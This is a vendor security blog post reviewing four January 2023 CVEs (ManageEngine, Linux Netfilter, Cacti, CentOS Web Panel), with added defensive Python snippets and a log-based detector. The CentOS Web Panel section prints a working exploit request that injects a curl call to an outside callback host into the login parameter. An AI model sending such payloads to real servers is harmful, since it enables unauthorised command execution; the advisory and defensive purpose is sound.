Top Trending CVEs of January 2023

Happy New Year! In this month’s trending CVEs, ManageEngine takes the top spot with yet another unauthenticated remote command execution (RCE) vulnerability that impacts a wide range of its products. A researcher poking around the Linux kernel has identified a buffer overflow in the Netfilter subsystem, which is used for various low-level network operations. Cacti, a popular open-source network monitoring framework, was hit with an unauthenticated remote command execution vulnerability. Finally, we cover an unauthenticated RCE vulnerability identified in CentOS Web Panel, which has roughly 35k deployments. In a surprising twist, all of these vulnerabilities have public exploit code. Roll up your sleeves and drop to a command line as we cover some of January’s trendiest vulnerabilities.

1. ManageEngine Unauthenticated RCE CVE-2022-47966

Researchers have identified an RCE vulnerability in a wide range of ManageEngine products, but only in deployments with SAML authentication enabled. The issue stems from an outdated Apache Santuario dependency, which is used for SAML validation, and specifically from the order in which SAML data is verified. SAML assertions are sent by the client (browser) as XML documents and contain various elements that the server must validate. On vulnerable deployments, the Apache Santuario library checks the “Reference” elements first and only then checks cryptographic integrity to ensure the SAML assertion was not tampered with. That verification order is the core of the vulnerability.

SAML Reference elements generally contain digest values, but they can also contain “Transform” elements that describe how to modify an element. “Transform” elements perform this modification via XSL transformations (XSLT), and within ManageEngine an XSLT is capable of executing arbitrary Java code. Bringing this all together, an attacker can craft a malicious SAML assertion containing “Transform” elements that result in arbitrary code execution, because those transforms are processed before the signature is ever checked.

The researcher who found this bug did so by analyzing the changes between ManageEngine updates, the most significant of which was the update of libxmlsec from v1.4.1 to v2.2.3. If you check the release notes for libxmlsec v1.4.2, you’ll notice that Reference element verification is performed last rather than first, eliminating an attacker’s ability to inject malformed values into a Transform element. Public exploit code and a vulnerability scanner have been released. Patch now, or disable SAML authentication until you can.
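As an added illustration (not NopSec’s, ManageEngine’s or Apache Santuario’s code) of the gate that the vulnerable verification order skips, the Python below inspects every Reference Transform in a SAML assertion and rejects anything outside a small allow-list before any transform is applied or any digest is computed. The two assertions and the allow-list are constructed for the demo; the signature check itself, which the fixed library performs before dereferencing References, is outside the scope of this snippet.

```python
# Added example (not NopSec's, ManageEngine's or Apache Santuario's code): refuse
# SAML assertions whose Reference Transforms use anything outside an allow-list,
# before any transform runs. Both sample assertions below are constructed.
import xml.etree.ElementTree as ET

DS = "{http://www.w3.org/2000/09/xmldsig#}"

# Transforms a SAML relying party actually needs; everything else is rejected.
ALLOWED_TRANSFORMS = frozenset({
    "http://www.w3.org/2000/09/xmldsig#enveloped-signature",
    "http://www.w3.org/2001/10/xml-exc-c14n#",
    "http://www.w3.org/2001/10/xml-exc-c14n#WithComments",
    "http://www.w3.org/TR/2001/REC-xml-c14n-20010315",
})
# The XML-DSig XSLT transform identifier, the one the write-up is about.
XSLT_TRANSFORM = "http://www.w3.org/TR/1999/REC-xslt-19991116"


def transform_algorithms(xml_text):
    """Every ds:Transform Algorithm URI declared under a ds:Reference."""
    root = ET.fromstring(xml_text)
    algorithms = []
    for reference in root.iter(DS + "Reference"):
        for transform in reference.iter(DS + "Transform"):
            algorithms.append(transform.get("Algorithm", ""))
    return algorithms


def disallowed_transforms(xml_text):
    """Transforms outside the allow-list; an empty list means the assertion may
    proceed to signature verification."""
    return [a for a in transform_algorithms(xml_text) if a not in ALLOWED_TRANSFORMS]


def precheck_assertion(xml_text):
    """Gate that runs before any Reference is dereferenced or transformed.
    Returns (ok, reason)."""
    bad = disallowed_transforms(xml_text)
    if bad:
        return False, "disallowed transform(s): " + ", ".join(bad)
    return True, "transforms within allow-list; proceed to signature check"


# Constructed: an ordinary assertion using only enveloped-signature and exc-c14n.
BENIGN = """<saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_a1">
  <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
    <ds:SignedInfo>
      <ds:Reference URI="#_a1">
        <ds:Transforms>
          <ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
          <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
        </ds:Transforms>
        <ds:DigestValue>ZmFrZQ==</ds:DigestValue>
      </ds:Reference>
    </ds:SignedInfo>
    <ds:SignatureValue>ZmFrZQ==</ds:SignatureValue>
  </ds:Signature>
</saml:Assertion>"""

# Constructed: same shape, but one Reference declares an XSLT transform. The
# stylesheet body is omitted; the Algorithm URI alone is enough to reject it.
WITH_XSLT = BENIGN.replace(
    '<ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>',
    '<ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116"/>',
)

if __name__ == "__main__":
    for name, document in (("benign", BENIGN), ("with_xslt", WITH_XSLT)):
        print(name, precheck_assertion(document))
```

The point of the ordering is that this allow-list check is cheap and needs no key material, so it can sit in front of signature verification without weakening it; what it must never do is evaluate a transform it has not yet approved.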

| Severity | Complexity | CVSS Score |
|---|---|---|
| Critical | Low | 9.8 |


Systems Impacted:

| Product Name | Impacted Version(s) | Fixed Version(s) | Released On |
|---|---|---|---|
| Access Manager Plus* | 4307 and below | 4308 | 7/11/2022 |
| Active Directory 360** | 4309 and below | 4310 | 28/10/2022 |
| ADAudit Plus** | 7080 and below | 7081 | 28/10/2022 |
| ADManager Plus** | 7161 and below | 7162 | 28/10/2022 |
| ADSelfService Plus** | 6210 and below | 6211 | 28/10/2022 |
| Analytics Plus* | 5140 and below | 5150 | 7/11/2022 |
| Application Control Plus* | 10.1.2220.17 and below | 10.1.2220.18 | 28/10/2022 |
| Asset Explorer** | 6982 and below | 6983 | 27/10/2022 |
| Browser Security Plus* | 11.1.2238.5 and below | 11.1.2238.6 | 28/10/2022 |
| Device Control Plus* | 10.1.2220.17 and below | 10.1.2220.18 | 28/10/2022 |
| Endpoint Central* | 10.1.2228.10 and below | 10.1.2228.11 | 28/10/2022 |
| Endpoint Central MSP* | 10.1.2228.10 and below | 10.1.2228.11 | 28/10/2022 |
| Endpoint DLP* | 10.1.2137.5 and below | 10.1.2137.6 | 28/10/2022 |
| Key Manager Plus* | 6400 and below | 6401 | 27/10/2022 |
| OS Deployer* | 1.1.2243.0 and below | 1.1.2243.1 | 28/10/2022 |
| PAM 360* | 5712 and below | 5713 | 7/11/2022 |
| Password Manager Pro* | 12123 and below | 12124 | 7/11/2022 |
| Patch Manager Plus* | 10.1.2220.17 and below | 10.1.2220.18 | 28/10/2022 |
| Remote Access Plus* | 10.1.2228.10 and below | 10.1.2228.11 | 28/10/2022 |
| Remote Monitoring and Management (RMM)* | 10.1.40 and below | 10.1.41 | 29/10/2022 |
| ServiceDesk Plus** | 14003 and below | 14004 | 27/10/2022 |
| ServiceDesk Plus MSP** | 13000 and below | 13001 | 27/10/2022 |
| SupportCenter Plus** | 11017 to 11025 | 11026 | 28/10/2022 |
| Vulnerability Manager Plus* | 10.1.2220.17 and below | 10.1.2220.18 | 28/10/2022 |


2. Linux Kernel Netfilter Buffer Overflow CVE-2023-0179

Linux kernel versions 5.5 through 6.2 are prone to a buffer overflow in the Netfilter subsystem. Netfilter is responsible for low-level networking operations and is often used in a capacity similar to iptables. The buffer overflow, present in the function nft_payload_copy_vlan, results from an integer underflow, which is a weird concept to wrap your brain around. Effectively, a buffer bounds check passes as true, but a typo in the subsequently processed code permits an integer underflow on an unsigned value, which yields an unintended, very large length. That length is then used by memcpy when copying into the previously allocated buffer, resulting in an out-of-bounds write, aka a buffer overflow. Publicly available exploits demonstrate that memory addresses can be leaked through the bug. Additionally, the researcher who published the advisory and patch provided evidence that it could be weaponized to achieve remote command execution resulting in privilege escalation; however, the proof of concept stopped short of a fully functional RCE payload. This vulnerability was assigned a CVSS score of only 4, based purely on information leakage, but it has the sneaky potential to introduce more risk than it would initially seem. I would bank on the eventual release of a weaponized payload capable of achieving remote command execution and privilege escalation. This vulnerability requires the ability to execute commands on the system, so direct unauthenticated remote exploitation is not possible.
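To make the underflow mechanics concrete, here is an added Python model of the bug class (not the kernel’s code: the names, header sizes and the exact grouping of the subtraction are constructed to reproduce the pattern, not nft_payload_copy_vlan verbatim). The length is emulated as an unsigned 8-bit value, so the bounds check correctly detects the overshoot, but the misplaced parentheses in the adjustment drive the length negative, which the unsigned type wraps to a large number that a memcpy would then use.

```python
# Added example, not kernel code: a model of the bug class described above.
# Sizes and names are constructed; the kernel's real arithmetic is not reproduced.

U8_MASK = 0xFF
BASE_HDR = 18   # constructed: bytes in the fixed part of the header
TAG_LEN = 4     # constructed: bytes added by an optional tag


def u8(value):
    """Emulate an unsigned 8-bit variable: results wrap modulo 256, so a
    negative intermediate result becomes a large positive one."""
    return value & U8_MASK


def copy_len_buggy(offset, length):
    """Bytes a buggy routine would hand to memcpy.

    `length` is the caller's requested byte count, held in a u8. The intent of
    the adjustment is: if offset+length reaches past the available header
    (BASE_HDR + TAG_LEN), shrink the copy by the overshoot. The bounds check
    itself is right, but the adjustment lacks parentheses, so it subtracts
    (offset + length - BASE_HDR) + TAG_LEN instead of the overshoot."""
    ethlen = u8(length)
    if offset + length > BASE_HDR + TAG_LEN:          # check passes on overshoot
        ethlen = u8(ethlen - (offset + length - BASE_HDR + TAG_LEN))
    return ethlen


def copy_len_fixed(offset, length):
    """Same routine with the overshoot grouped correctly."""
    ethlen = u8(length)
    if offset + length > BASE_HDR + TAG_LEN:
        ethlen = u8(ethlen - (offset + length - (BASE_HDR + TAG_LEN)))
    return ethlen


def overflows(copy_len, dst_size):
    """True when a memcpy of copy_len bytes would write past a dst_size buffer."""
    return copy_len > dst_size


def compare(offset, length):
    """Return (buggy_len, fixed_len, buggy_overflows) for a destination sized
    for the requested length, which is what the caller allocated."""
    buggy, fixed = copy_len_buggy(offset, length), copy_len_fixed(offset, length)
    return buggy, fixed, overflows(buggy, length)


if __name__ == "__main__":
    # Constructed inputs: a window that overshoots the header by 7 bytes.
    print("overshoot:", compare(21, 8))   # buggy length wraps, fixed length is 1
    print("in bounds:", compare(2, 8))    # both paths copy the requested 8 bytes
```

The takeaway for review is that an unsigned subtraction is only safe when the subtrahend is provably no larger than the minuend; a bounds check that precedes it does not help if the arithmetic after the check is not the quantity the check bounded.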

| Severity | Complexity | CVSS Score |
|---|---|---|
| Moderate | Moderate | 4 |

Systems/Applications Impacted: All Linux kernel versions from 5.5 to 6.2-rc3


3. Cacti Unauthenticated RCE CVE-2022-46169

Cacti is an open-source network monitoring framework with roughly 35,000 deployments worldwide (according to the Cacti team), thousands of which are publicly accessible. Within Cacti, the “remote_agent.php” script was found to be prone to an authentication bypass vulnerability that can be chained with another flaw to achieve RCE. Authentication bypass is possible due to the manner in which remote clients are authorized when accessing “remote_agent.php”. As part of the authorization process the client IP is captured. The “get_client_address” function inspects a number of different values to retrieve the IP address, some of which are HTTP headers that an attacker fully controls. By injecting the IP address of the Cacti server into, for example, an HTTP_X_FORWARDED header, it’s possible to compel the server to perform a hostname lookup on an attacker-chosen address. The resolved hostname is then compared against a table of authorized hosts, which by default includes the Cacti web server. Once authorization is bypassed, attackers can inject arbitrary commands into the “poller_id” parameter, which under the correct conditions becomes the first parameter of a call to “proc_open”, leading to RCE. This is a pretty cool vuln and very easy to exploit. Patch now!
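The two decisions the Cacti write-up hinges on, which source to trust for the client address and what poller_id may contain, as an added Python sketch that is not Cacti’s code. Names, headers and addresses are constructed, and the hostname lookup the real authorization performs is stood in for by a direct comparison against a constructed set of authorized addresses.

```python
# Added example, not Cacti's code: header-derived client addresses and
# numeric-only poller ids. All names, headers and addresses are constructed.

# Constructed stand-in for the table of authorized hosts (the real check
# resolves a hostname first; a plain address comparison is used here).
AUTHORIZED_HOSTS = frozenset({"127.0.0.1", "10.0.0.5"})

# Sources a naive implementation consults, in order, to find "the client IP".
# Every entry but REMOTE_ADDR is a request header the client chooses freely.
FORWARDING_HEADERS = ("HTTP_X_FORWARDED_FOR", "HTTP_X_FORWARDED", "HTTP_CLIENT_IP")


def client_address_naive(environ):
    """Vulnerable pattern: the first forwarding header present wins."""
    for header in FORWARDING_HEADERS:
        value = environ.get(header, "").strip()
        if value:
            return value.split(",")[0].strip()
    return environ["REMOTE_ADDR"]


def client_address_hardened(environ, trusted_proxies=frozenset()):
    """Hardened pattern: the TCP peer address is authoritative unless that peer
    is a reverse proxy we configured, in which case the hop it appended is used."""
    peer = environ["REMOTE_ADDR"]
    forwarded = environ.get("HTTP_X_FORWARDED_FOR", "")
    if peer in trusted_proxies and forwarded:
        return forwarded.split(",")[-1].strip()
    return peer


def is_authorized(address):
    return address in AUTHORIZED_HOSTS


def validate_poller_id(raw):
    """poller_id is later handed to a process launch; accept only a positive
    integer and raise on anything else, so no metacharacters reach that call."""
    raw = raw.strip()
    if not (raw.isascii() and raw.isdigit()) or int(raw) <= 0:
        raise ValueError("poller_id must be a positive integer")
    return int(raw)


# Constructed request: an outside client that sets a forwarding header to the
# server's own loopback address.
SPOOFED = {"REMOTE_ADDR": "203.0.113.9", "HTTP_X_FORWARDED": "127.0.0.1"}

# Constructed request arriving through a configured reverse proxy.
PROXIED = {"REMOTE_ADDR": "10.0.0.2", "HTTP_X_FORWARDED_FOR": "198.51.100.7"}
TRUSTED_PROXIES = frozenset({"10.0.0.2"})

if __name__ == "__main__":
    naive = client_address_naive(SPOOFED)
    hardened = client_address_hardened(SPOOFED)
    print("naive   :", naive, "authorized" if is_authorized(naive) else "denied")
    print("hardened:", hardened, "authorized" if is_authorized(hardened) else "denied")
    print("via proxy:", client_address_hardened(PROXIED, TRUSTED_PROXIES))
```

Note that the hardened variant does not make forwarding headers useless; it only honours them when the connection actually came from a proxy the operator listed, which is the one situation in which the header carries information the peer address does not.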

| Severity | Complexity | CVSS Score |
|---|---|---|
| Critical | Low | 9.8 |

Systems/Applications Impacted: Cacti version 1.2.22 and below


4. CentOS Web Panel 7 Unauthenticated RCE CVE-2022-44877

CentOS Web Panel, a Linux-based web hosting management system, is prone to a trivial remote command execution vulnerability. It was determined that the “login/index.php” script fails to sufficiently sanitize input supplied to the “login” URL query parameter. Crafted requests that contain shell metacharacters injected into the vulnerable parameter result in remote command execution. Exploitation is extremely trivial, as demonstrated below:

```http
POST /login/index.php?login=$(curl${IFS}iwib5kpqofvnzn6f7dnwdmz86zcq0ho6.oastify.com) HTTP/1.1
Host: 10.13.37.10:2031
Cookie: cwpsrv-2dbdc5905576590830494c54c04a1b01=6ahj1a6etv72ut1eaupietdk82
Content-Length: 40
Origin: https://10.13.37.10:2031
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://10.13.37.10:2031/login/index.php?login=failed
Accept-Encoding: gzip, deflate
Accept-Language: en
Connection: close

username=root&password=toor&commit=Login
```

When submitted, the above request will process the “curl” command injected into the “login” URL query parameter. It would be trivial to turn this into a reverse shell. Patch now!
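An added, log-side detection for the request shape shown above (not NopSec’s or CentOS Web Panel’s code): it parses constructed access-log lines, URL-decodes the login query parameter and flags values containing shell command-substitution or separator characters. The log format, the sample lines and the allow-list of legitimate login status values are all assumptions made for the demo.

```python
# Added example, not NopSec's or CWP's code: flag login query values that carry
# shell command-substitution or separator characters. Log lines are constructed.
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx-style combined log line; only the fields the detector needs are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Command substitution, the ${IFS} word separator, and command separators.
SUSPICIOUS = re.compile(r"\$\(|`|\$\{IFS\}|;|\|\||&&|\n")

# Assumed allow-list of legitimate values for the parameter; adjust to the application.
LEGIT_LOGIN_STATUS = frozenset({"failed", "success", ""})


def parse_line(line):
    """Split one access-log line into fields, or None if it does not match."""
    match = LOG_RE.match(line)
    return match.groupdict() if match else None


def login_values(target):
    """URL-decoded values of the `login` query parameter in a request target."""
    return parse_qs(urlsplit(target).query, keep_blank_values=True).get("login", [])


def is_suspicious_value(value):
    return SUSPICIOUS.search(value) is not None


def is_legit_value(value):
    """Mitigation side: the server should only accept values from the allow-list."""
    return value in LEGIT_LOGIN_STATUS


def scan(lines):
    """Return one record per decoded login value that trips the pattern."""
    hits = []
    for line in lines:
        record = parse_line(line)
        if record is None:
            continue
        for value in login_values(record["target"]):
            if is_suspicious_value(value):
                hits.append({"ip": record["ip"], "ts": record["ts"], "login": value})
    return hits


# Constructed sample log: two injection attempts, two ordinary requests, one junk line.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Jan/2023:10:02:11 +0000] "POST /login/index.php?login=%24%28id%29 HTTP/1.1" 200 512',
    '198.51.100.3 - - [12/Jan/2023:10:03:40 +0000] "GET /login/index.php?login=failed HTTP/1.1" 200 2048',
    '203.0.113.8 - - [12/Jan/2023:10:05:02 +0000] "POST /login/index.php?login=%24%7BIFS%7Dfailed HTTP/1.1" 200 512',
    '198.51.100.4 - - [12/Jan/2023:10:06:15 +0000] "GET /index.php HTTP/1.1" 200 1024',
    "not a log line",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Decoding before matching matters: the metacharacters arrive percent-encoded in the log, so a pattern applied to the raw line would miss them. On the server side, the allow-list check is the fix; the parameter only ever needs to carry a status keyword, so there is no reason to accept anything else.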

| Severity | Complexity | CVSS Score |
|---|---|---|
| High | Low | 9.8 |

Systems/Applications Impacted: CentOS Web Panel 7 version 0.9.8.1146 or earlier


To stay up to date on the latest trending and critical celebrity vulnerabilities, subscribe to NopSec’s newsletter. If you don’t like having to keep up with vulnerabilities like these yourself, let our Unified VRM platform do it for you. It takes into account new critical vulnerabilities as they emerge, ensuring your risks are prioritized accordingly in your unique environment. If you’d like to see what NopSec’s Unified VRM can do in action watch this on-demand product tour.
